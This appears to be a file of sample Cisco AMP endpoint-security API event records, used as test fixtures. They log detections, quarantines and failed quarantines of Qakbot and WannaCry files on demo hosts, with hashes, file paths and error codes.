-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 